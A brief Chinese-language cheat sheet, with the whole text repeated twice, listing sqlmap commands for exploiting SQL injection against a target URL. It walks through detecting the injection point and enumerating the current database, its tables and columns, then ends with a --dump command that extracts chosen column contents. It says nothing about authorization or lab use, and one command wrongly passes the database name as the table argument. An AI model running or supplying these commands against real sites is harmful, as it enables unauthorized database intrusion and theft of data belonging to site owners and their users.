首先判断是get请求还是post请求
get请求,直接通过URL判断是否存在注入点
sqlmap -u url
查询出数据库名称
sqlmap -u url --current-db
查询出表名
sqlmap -u url -D 数据库名 -T 数据库名 --tables
查询字段名
sqlmap -u url -D 数据库名 -T 表名 --columns
进行爆破
sqlmap -u url -D 数据库名 -T 表名 -C 列名,列名 --dump
首先判断是get请求还是post请求
get请求,直接通过URL判断是否存在注入点
sqlmap -u url
查询出数据库名称
sqlmap -u url --current-db
查询出表名
sqlmap -u url -D 数据库名 -T 数据库名 --tables
查询字段名
sqlmap -u url -D 数据库名 -T 表名 --columns
进行爆破
sqlmap -u url -D 数据库名 -T 表名 -C 列名,列名 --dump